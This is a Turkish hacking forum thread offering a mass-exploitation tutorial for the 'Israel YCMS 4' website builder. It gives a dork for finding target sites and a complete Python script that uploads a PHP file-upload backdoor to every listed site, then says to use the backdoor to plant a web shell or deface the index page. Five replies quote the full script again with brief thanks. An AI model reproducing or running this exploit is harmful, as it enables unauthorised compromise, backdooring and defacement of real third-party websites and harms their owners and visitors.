İsrael YCMS 4 - Remote File Upload / Shell Upload

OBT is HeRYerDe

Anka Team
11 Ara 2020
2,668
1,527
812441-200.png

wabout.png



Merhaba Değerli Türk Hack Team Üyeleri
Bu Konumuzda İsrael YCMS 4 Webapps'ta Remote File Upload Zafiyetini İnceleyeceğiz!


YNY5Ak.png


[+] Hedef Toplama


Dork: intext:נבנה ע"י לק"י בניית אתרים


Öncelikle Dorkumuzu Taratıp Siteleri Topluyorum

bs3gutc.png


Ardından Topladığım Siteleri 'domains.txt' Diye Kaydediyorum.

c075jvj.png

YNY5Ak.png


[+] Exploit İle Zafiyeti Sömürme


Python:
import requests # type: ignore
import re
from colorama import *
import os
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
init()
code_up = """
<!DOCTYPE html>
<html>
<head>
<title>1933-SS</title>
<style>
body {
background-color: black;
text-align: center;
}
h1 {
color: red;
}
.uploaded {
color: green;
}
</style>
</head>
<body>
<h1>1933-ss cyber team</h1>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='file' name='uploaded_file'></input>
<input type='submit' value='Upload'></input>
</form>
</body>
</html>
<?php
if (!empty($_FILES['uploaded_file'])) {
$upload_dir = './'; // Define the directory where you want to save the uploaded files
$file_name = basename($_FILES['uploaded_file']['name']);
$file_path = $upload_dir . $file_name;
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) {
echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>';
} else {
echo '<h1>There was an error uploading the file, please try again.</h1>';
}
}
?>
"""
banner = Fore.RED +"""

                           ) (   (       ) (      
   (                    ( /( )\ ))\ ) ( /( )\ )  *   )
   )\  (   (  (     (   )\()|()/(()/( )\()|()/(` )  /(
(((_) )\  )\ )\    )\ ((_)\ /(_))(_)|(_)\ /(_))( )(_))
)\___((_)((_|(_)  ((_)__((_|_))(_))   ((_|_)) (_(_())
((/ __\ \ / /| __| | __\ \/ / _ \ |   / _ \_ _||_   _|
| (__ \ V / | _|  | _| >  <|  _/ |__| (_) | |   | |
  \___| \_/  |___| |___/_/\_\_| |____|\___/___|  |_|
                                                  
"""
banner2 = "\nAuthor :" + Fore.RED +""" @obttht"""
print(banner+banner2+Fore.WHITE)
websites = input("\nWebsite List: ")
websites = open(websites,"r").read().split("\n")
for url in websites:
    try:
        value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en"
        upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*'
        uploader = {'upload-to-gallery[]': ('ss.php',code_up)}
        response = requests.post(upload_url, files=uploader , timeout=3)
    except:
        pass
    try:
        response = requests.get(url+value,timeout=10)
        if response.status_code == 200:
            match = re.search(r'/ss(\d+\.php)', response.text)
            if match:
                value = match.group(1)
                print(Fore.GREEN +url+f"uploads/other/ss{value}")
            else:
                print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE)
    except:
        continue

Exploiti 'exp.py' Diye Kaydediyorum Ve Çalıştırıyorum

ps99lsj.png


Bizden Website List İstiyor '
domains.txt' Diye Kaydettiğimiz Dosyayı List Olarak Belirtiyoruz Ve Enterliyoruz

sTdNEBF.png



Exploit Siteye Uploader'i Başarılı Bir Şekilde Enjekte Etti!



YNY5Ak.png




[+] İndex / Shell Upload



MIRls3q.png



Exploitin Verdiği URL Bizi Uploader'e Yönlendiriyor, Buradan Shell Veya İndex Basıyoruz Ve Görev Tamam!


eimwdl5.png




[-] Title : israel YCMS 4 - Remote File Upload - CSRF / Shell Upload[-] Author : 1933 (TURK TM - SS CYBER)[-] Vendor : https://website.laki.co.il/[-] Category : Webapps[-] Dork : intext:נבנה ע"י לק"י בניית אתרים[-] Date : 20/11/2023

https://cxsecurity.com/issue/WLB-2023110032
guieh9x.png


af8mqjc.gif
 
Son düzenleme:

şıkk

Üye
24 Eki 2023
120
57
812441-200.png

wabout.png



Merhaba Değerli Türk Hack Team Üyeleri
Bu Konumuzda İsrael YCMS 4 Webapps'ta Remote File Upload Zafiyetini İnceleyeceğiz!


YNY5Ak.png


[+] Hedef Toplama


Dork: intext:נבנה ע"י לק"י בניית אתרים


Öncelikle Dorkumuzu Taratıp Siteleri Topluyorum

bs3gutc.png


Ardından Topladığım Siteleri 'domains.txt' Diye Kaydediyorum.

c075jvj.png

YNY5Ak.png


[+] Exploit İle Zafiyeti Sömürme


Python:
import requests # type: ignore
import re
from colorama import *
import os
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
init()
code_up = """
<!DOCTYPE html>
<html>
<head>
<title>1933-SS</title>
<style>
body {
background-color: black;
text-align: center;
}
h1 {
color: red;
}
.uploaded {
color: green;
}
</style>
</head>
<body>
<h1>1933-ss cyber team</h1>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='file' name='uploaded_file'></input>
<input type='submit' value='Upload'></input>
</form>
</body>
</html>
<?php
if (!empty($_FILES['uploaded_file'])) {
$upload_dir = './'; // Define the directory where you want to save the uploaded files
$file_name = basename($_FILES['uploaded_file']['name']);
$file_path = $upload_dir . $file_name;
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) {
echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>';
} else {
echo '<h1>There was an error uploading the file, please try again.</h1>';
}
}
?>
"""
banner = Fore.RED +"""

                           ) (   (       ) (         
   (                    ( /( )\ ))\ ) ( /( )\ )  *   )
   )\  (   (  (     (   )\()|()/(()/( )\()|()/(` )  /(
(((_) )\  )\ )\    )\ ((_)\ /(_))(_)|(_)\ /(_))( )(_))
)\___((_)((_|(_)  ((_)__((_|_))(_))   ((_|_)) (_(_())
((/ __\ \ / /| __| | __\ \/ / _ \ |   / _ \_ _||_   _|
| (__ \ V / | _|  | _| >  <|  _/ |__| (_) | |   | | 
  \___| \_/  |___| |___/_/\_\_| |____|\___/___|  |_| 
                                                     
"""
banner2 = "\nAuthor :" + Fore.RED +""" @obttht"""
print(banner+banner2+Fore.WHITE)
websites = input("\nWebsite List: ")
websites = open(websites,"r").read().split("\n")
for url in websites:
    try:
        value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en"
        upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*'
        uploader = {'upload-to-gallery[]': ('ss.php',code_up)}
        response = requests.post(upload_url, files=uploader , timeout=3)
    except:
        pass
    try:
        response = requests.get(url+value,timeout=10)
        if response.status_code == 200:
            match = re.search(r'/ss(\d+\.php)', response.text)
            if match:
                value = match.group(1)
                print(Fore.GREEN +url+f"uploads/other/ss{value}")
            else:
                print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE)
    except:
        continue

Exploiti 'exp.py' Diye Kaydediyorum Ve Çalıştırıyorum

ps99lsj.png


Bizden Website List İstiyor '
domains.txt' Diye Kaydettiğimiz Dosyayı List Olarak Belirtiyoruz Ve Enterliyoruz

sTdNEBF.png



Exploit Siteye Uploader'i Başarılı Bir Şekilde Enjekte Etti!



YNY5Ak.png




[+] İndex / Shell Upload



MIRls3q.png




Exploitin Verdiği URL Bizi Uploader'e Yönlendiriyor, Buradan Shell Veya İndex Basıyoruz Ve Görev Tamam!



[-] Title : israel YCMS 4 - Remote File Upload - CSRF / Shell Upload[-] Author : 1933 (TURK TM - SS CYBER)[-] Vendor : https://website.laki.co.il/[-] Category : Webapps[-] Dork : intext:נבנה ע"י לק"י בניית אתרים[-] Date : 20/11/2023

https://cxsecurity.com/issue/WLB-2023110032



guieh9x.png


af8mqjc.gif
Emeğine sağlık hocam
 

kenansvc

Yeni üye
12 Eki 2013
28
11
812441-200.png

wabout.png



Merhaba Değerli Türk Hack Team Üyeleri
Bu Konumuzda İsrael YCMS 4 Webapps'ta Remote File Upload Zafiyetini İnceleyeceğiz!


YNY5Ak.png


[+] Hedef Toplama


Dork: intext:נבנה ע"י לק"י בניית אתרים


Öncelikle Dorkumuzu Taratıp Siteleri Topluyorum

bs3gutc.png


Ardından Topladığım Siteleri 'domains.txt' Diye Kaydediyorum.

c075jvj.png

YNY5Ak.png


[+] Exploit İle Zafiyeti Sömürme


Python:
import requests # type: ignore
import re
from colorama import *
import os
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
init()
code_up = """
<!DOCTYPE html>
<html>
<head>
<title>1933-SS</title>
<style>
body {
background-color: black;
text-align: center;
}
h1 {
color: red;
}
.uploaded {
color: green;
}
</style>
</head>
<body>
<h1>1933-ss cyber team</h1>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='file' name='uploaded_file'></input>
<input type='submit' value='Upload'></input>
</form>
</body>
</html>
<?php
if (!empty($_FILES['uploaded_file'])) {
$upload_dir = './'; // Define the directory where you want to save the uploaded files
$file_name = basename($_FILES['uploaded_file']['name']);
$file_path = $upload_dir . $file_name;
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) {
echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>';
} else {
echo '<h1>There was an error uploading the file, please try again.</h1>';
}
}
?>
"""
banner = Fore.RED +"""

                           ) (   (       ) (       
   (                    ( /( )\ ))\ ) ( /( )\ )  *   )
   )\  (   (  (     (   )\()|()/(()/( )\()|()/(` )  /(
(((_) )\  )\ )\    )\ ((_)\ /(_))(_)|(_)\ /(_))( )(_))
)\___((_)((_|(_)  ((_)__((_|_))(_))   ((_|_)) (_(_())
((/ __\ \ / /| __| | __\ \/ / _ \ |   / _ \_ _||_   _|
| (__ \ V / | _|  | _| >  <|  _/ |__| (_) | |   | |
  \___| \_/  |___| |___/_/\_\_| |____|\___/___|  |_|
                                                   
"""
banner2 = "\nAuthor :" + Fore.RED +""" @obttht"""
print(banner+banner2+Fore.WHITE)
websites = input("\nWebsite List: ")
websites = open(websites,"r").read().split("\n")
for url in websites:
    try:
        value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en"
        upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*'
        uploader = {'upload-to-gallery[]': ('ss.php',code_up)}
        response = requests.post(upload_url, files=uploader , timeout=3)
    except:
        pass
    try:
        response = requests.get(url+value,timeout=10)
        if response.status_code == 200:
            match = re.search(r'/ss(\d+\.php)', response.text)
            if match:
                value = match.group(1)
                print(Fore.GREEN +url+f"uploads/other/ss{value}")
            else:
                print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE)
    except:
        continue

Exploiti 'exp.py' Diye Kaydediyorum Ve Çalıştırıyorum

ps99lsj.png


Bizden Website List İstiyor '
domains.txt' Diye Kaydettiğimiz Dosyayı List Olarak Belirtiyoruz Ve Enterliyoruz

sTdNEBF.png



Exploit Siteye Uploader'i Başarılı Bir Şekilde Enjekte Etti!



YNY5Ak.png




[+] İndex / Shell Upload



MIRls3q.png




Exploitin Verdiği URL Bizi Uploader'e Yönlendiriyor, Buradan Shell Veya İndex Basıyoruz Ve Görev Tamam!



[-] Title : israel YCMS 4 - Remote File Upload - CSRF / Shell Upload[-] Author : 1933 (TURK TM - SS CYBER)[-] Vendor : https://website.laki.co.il/[-] Category : Webapps[-] Dork : intext:נבנה ע"י לק"י בניית אתרים[-] Date : 20/11/2023

https://cxsecurity.com/issue/WLB-2023110032
guieh9x.png


af8mqjc.gif
stokladım lazım olucak
 

x1axe

Moderasyon Ekibi Çaylak
28 May 2022
62
12
812441-200.png

wabout.png



Merhaba Değerli Türk Hack Team Üyeleri
Bu Konumuzda İsrael YCMS 4 Webapps'ta Remote File Upload Zafiyetini İnceleyeceğiz!


YNY5Ak.png


[+] Hedef Toplama


Dork: intext:נבנה ע"י לק"י בניית אתרים


Öncelikle Dorkumuzu Taratıp Siteleri Topluyorum

bs3gutc.png


Ardından Topladığım Siteleri 'domains.txt' Diye Kaydediyorum.

c075jvj.png

YNY5Ak.png


[+] Exploit İle Zafiyeti Sömürme


Python:
import requests # type: ignore
import re
from colorama import *
import os
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
init()
code_up = """
<!DOCTYPE html>
<html>
<head>
<title>1933-SS</title>
<style>
body {
background-color: black;
text-align: center;
}
h1 {
color: red;
}
.uploaded {
color: green;
}
</style>
</head>
<body>
<h1>1933-ss cyber team</h1>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='file' name='uploaded_file'></input>
<input type='submit' value='Upload'></input>
</form>
</body>
</html>
<?php
if (!empty($_FILES['uploaded_file'])) {
$upload_dir = './'; // Define the directory where you want to save the uploaded files
$file_name = basename($_FILES['uploaded_file']['name']);
$file_path = $upload_dir . $file_name;
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) {
echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>';
} else {
echo '<h1>There was an error uploading the file, please try again.</h1>';
}
}
?>
"""
banner = Fore.RED +"""

                           ) (   (       ) (     
   (                    ( /( )\ ))\ ) ( /( )\ )  *   )
   )\  (   (  (     (   )\()|()/(()/( )\()|()/(` )  /(
(((_) )\  )\ )\    )\ ((_)\ /(_))(_)|(_)\ /(_))( )(_))
)\___((_)((_|(_)  ((_)__((_|_))(_))   ((_|_)) (_(_())
((/ __\ \ / /| __| | __\ \/ / _ \ |   / _ \_ _||_   _|
| (__ \ V / | _|  | _| >  <|  _/ |__| (_) | |   | |
  \___| \_/  |___| |___/_/\_\_| |____|\___/___|  |_|
                                                 
"""
banner2 = "\nAuthor :" + Fore.RED +""" @obttht"""
print(banner+banner2+Fore.WHITE)
websites = input("\nWebsite List: ")
websites = open(websites,"r").read().split("\n")
for url in websites:
    try:
        value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en"
        upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*'
        uploader = {'upload-to-gallery[]': ('ss.php',code_up)}
        response = requests.post(upload_url, files=uploader , timeout=3)
    except:
        pass
    try:
        response = requests.get(url+value,timeout=10)
        if response.status_code == 200:
            match = re.search(r'/ss(\d+\.php)', response.text)
            if match:
                value = match.group(1)
                print(Fore.GREEN +url+f"uploads/other/ss{value}")
            else:
                print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE)
    except:
        continue

Exploiti 'exp.py' Diye Kaydediyorum Ve Çalıştırıyorum

ps99lsj.png


Bizden Website List İstiyor '
domains.txt' Diye Kaydettiğimiz Dosyayı List Olarak Belirtiyoruz Ve Enterliyoruz

sTdNEBF.png



Exploit Siteye Uploader'i Başarılı Bir Şekilde Enjekte Etti!



YNY5Ak.png




[+] İndex / Shell Upload



MIRls3q.png



Exploitin Verdiği URL Bizi Uploader'e Yönlendiriyor, Buradan Shell Veya İndex Basıyoruz Ve Görev Tamam!


eimwdl5.png




[-] Title : israel YCMS 4 - Remote File Upload - CSRF / Shell Upload[-] Author : 1933 (TURK TM - SS CYBER)[-] Vendor : https://website.laki.co.il/[-] Category : Webapps[-] Dork : intext:נבנה ע"י לק"י בניית אתרים[-] Date : 20/11/2023

https://cxsecurity.com/issue/WLB-2023110032
guieh9x.png


af8mqjc.gif
eline sağlık hocam
 

SiberAslan

Üye
24 May 2024
128
52
Ötüken.
812441-200.png

wabout.png



Merhaba Değerli Türk Hack Team Üyeleri
Bu Konumuzda İsrael YCMS 4 Webapps'ta Remote File Upload Zafiyetini İnceleyeceğiz!


YNY5Ak.png


[+] Hedef Toplama


Dork: intext:נבנה ע"י לק"י בניית אתרים


Öncelikle Dorkumuzu Taratıp Siteleri Topluyorum

bs3gutc.png


Ardından Topladığım Siteleri 'domains.txt' Diye Kaydediyorum.

c075jvj.png

YNY5Ak.png


[+] Exploit İle Zafiyeti Sömürme


Python:
import requests # type: ignore
import re
from colorama import *
import os
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
init()
code_up = """
<!DOCTYPE html>
<html>
<head>
<title>1933-SS</title>
<style>
body {
background-color: black;
text-align: center;
}
h1 {
color: red;
}
.uploaded {
color: green;
}
</style>
</head>
<body>
<h1>1933-ss cyber team</h1>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='file' name='uploaded_file'></input>
<input type='submit' value='Upload'></input>
</form>
</body>
</html>
<?php
if (!empty($_FILES['uploaded_file'])) {
$upload_dir = './'; // Define the directory where you want to save the uploaded files
$file_name = basename($_FILES['uploaded_file']['name']);
$file_path = $upload_dir . $file_name;
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) {
echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>';
} else {
echo '<h1>There was an error uploading the file, please try again.</h1>';
}
}
?>
"""
banner = Fore.RED +"""

                           ) (   (       ) (     
   (                    ( /( )\ ))\ ) ( /( )\ )  *   )
   )\  (   (  (     (   )\()|()/(()/( )\()|()/(` )  /(
(((_) )\  )\ )\    )\ ((_)\ /(_))(_)|(_)\ /(_))( )(_))
)\___((_)((_|(_)  ((_)__((_|_))(_))   ((_|_)) (_(_())
((/ __\ \ / /| __| | __\ \/ / _ \ |   / _ \_ _||_   _|
| (__ \ V / | _|  | _| >  <|  _/ |__| (_) | |   | |
  \___| \_/  |___| |___/_/\_\_| |____|\___/___|  |_|
                                                 
"""
banner2 = "\nAuthor :" + Fore.RED +""" @obttht"""
print(banner+banner2+Fore.WHITE)
websites = input("\nWebsite List: ")
websites = open(websites,"r").read().split("\n")
for url in websites:
    try:
        value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en"
        upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*'
        uploader = {'upload-to-gallery[]': ('ss.php',code_up)}
        response = requests.post(upload_url, files=uploader , timeout=3)
    except:
        pass
    try:
        response = requests.get(url+value,timeout=10)
        if response.status_code == 200:
            match = re.search(r'/ss(\d+\.php)', response.text)
            if match:
                value = match.group(1)
                print(Fore.GREEN +url+f"uploads/other/ss{value}")
            else:
                print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE)
    except:
        continue

Exploiti 'exp.py' Diye Kaydediyorum Ve Çalıştırıyorum

ps99lsj.png


Bizden Website List İstiyor '
domains.txt' Diye Kaydettiğimiz Dosyayı List Olarak Belirtiyoruz Ve Enterliyoruz

sTdNEBF.png



Exploit Siteye Uploader'i Başarılı Bir Şekilde Enjekte Etti!



YNY5Ak.png




[+] İndex / Shell Upload



MIRls3q.png



Exploitin Verdiği URL Bizi Uploader'e Yönlendiriyor, Buradan Shell Veya İndex Basıyoruz Ve Görev Tamam!


eimwdl5.png




[-] Title : israel YCMS 4 - Remote File Upload - CSRF / Shell Upload[-] Author : 1933 (TURK TM - SS CYBER)[-] Vendor : https://website.laki.co.il/[-] Category : Webapps[-] Dork : intext:נבנה ע"י לק"י בניית אתרים[-] Date : 20/11/2023

https://cxsecurity.com/issue/WLB-2023110032
guieh9x.png


af8mqjc.gif
Eline saglik hocam
 

Xlog

Vip Altın Üye
21 Nis 2024
34
30
812441-200.png

wabout.png



Merhaba Değerli Türk Hack Team Üyeleri
Bu Konumuzda İsrael YCMS 4 Webapps'ta Remote File Upload Zafiyetini İnceleyeceğiz!


YNY5Ak.png


[+] Hedef Toplama


Dork: intext:נבנה ע"י לק"י בניית אתרים


Öncelikle Dorkumuzu Taratıp Siteleri Topluyorum

bs3gutc.png


Ardından Topladığım Siteleri 'domains.txt' Diye Kaydediyorum.

c075jvj.png

YNY5Ak.png


[+] Exploit İle Zafiyeti Sömürme


Python:
import requests # type: ignore
import re
from colorama import *
import os
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
init()
code_up = """
<!DOCTYPE html>
<html>
<head>
<title>1933-SS</title>
<style>
body {
background-color: black;
text-align: center;
}
h1 {
color: red;
}
.uploaded {
color: green;
}
</style>
</head>
<body>
<h1>1933-ss cyber team</h1>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='file' name='uploaded_file'></input>
<input type='submit' value='Upload'></input>
</form>
</body>
</html>
<?php
if (!empty($_FILES['uploaded_file'])) {
$upload_dir = './'; // Define the directory where you want to save the uploaded files
$file_name = basename($_FILES['uploaded_file']['name']);
$file_path = $upload_dir . $file_name;
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) {
echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>';
} else {
echo '<h1>There was an error uploading the file, please try again.</h1>';
}
}
?>
"""
banner = Fore.RED +"""

                           ) (   (       ) (     
   (                    ( /( )\ ))\ ) ( /( )\ )  *   )
   )\  (   (  (     (   )\()|()/(()/( )\()|()/(` )  /(
(((_) )\  )\ )\    )\ ((_)\ /(_))(_)|(_)\ /(_))( )(_))
)\___((_)((_|(_)  ((_)__((_|_))(_))   ((_|_)) (_(_())
((/ __\ \ / /| __| | __\ \/ / _ \ |   / _ \_ _||_   _|
| (__ \ V / | _|  | _| >  <|  _/ |__| (_) | |   | |
  \___| \_/  |___| |___/_/\_\_| |____|\___/___|  |_|
                                                 
"""
banner2 = "\nAuthor :" + Fore.RED +""" @obttht"""
print(banner+banner2+Fore.WHITE)
websites = input("\nWebsite List: ")
websites = open(websites,"r").read().split("\n")
for url in websites:
    try:
        value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en"
        upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*'
        uploader = {'upload-to-gallery[]': ('ss.php',code_up)}
        response = requests.post(upload_url, files=uploader , timeout=3)
    except:
        pass
    try:
        response = requests.get(url+value,timeout=10)
        if response.status_code == 200:
            match = re.search(r'/ss(\d+\.php)', response.text)
            if match:
                value = match.group(1)
                print(Fore.GREEN +url+f"uploads/other/ss{value}")
            else:
                print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE)
    except:
        continue

Exploiti 'exp.py' Diye Kaydediyorum Ve Çalıştırıyorum

ps99lsj.png


Bizden Website List İstiyor '
domains.txt' Diye Kaydettiğimiz Dosyayı List Olarak Belirtiyoruz Ve Enterliyoruz

sTdNEBF.png



Exploit Siteye Uploader'i Başarılı Bir Şekilde Enjekte Etti!



YNY5Ak.png




[+] İndex / Shell Upload



MIRls3q.png



Exploitin Verdiği URL Bizi Uploader'e Yönlendiriyor, Buradan Shell Veya İndex Basıyoruz Ve Görev Tamam!


eimwdl5.png




[-] Title : israel YCMS 4 - Remote File Upload - CSRF / Shell Upload[-] Author : 1933 (TURK TM - SS CYBER)[-] Vendor : https://website.laki.co.il/[-] Category : Webapps[-] Dork : intext:נבנה ע"י לק"י בניית אתרים[-] Date : 20/11/2023

https://cxsecurity.com/issue/WLB-2023110032
guieh9x.png


af8mqjc.gif
Emeğinize sağlık hocam
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.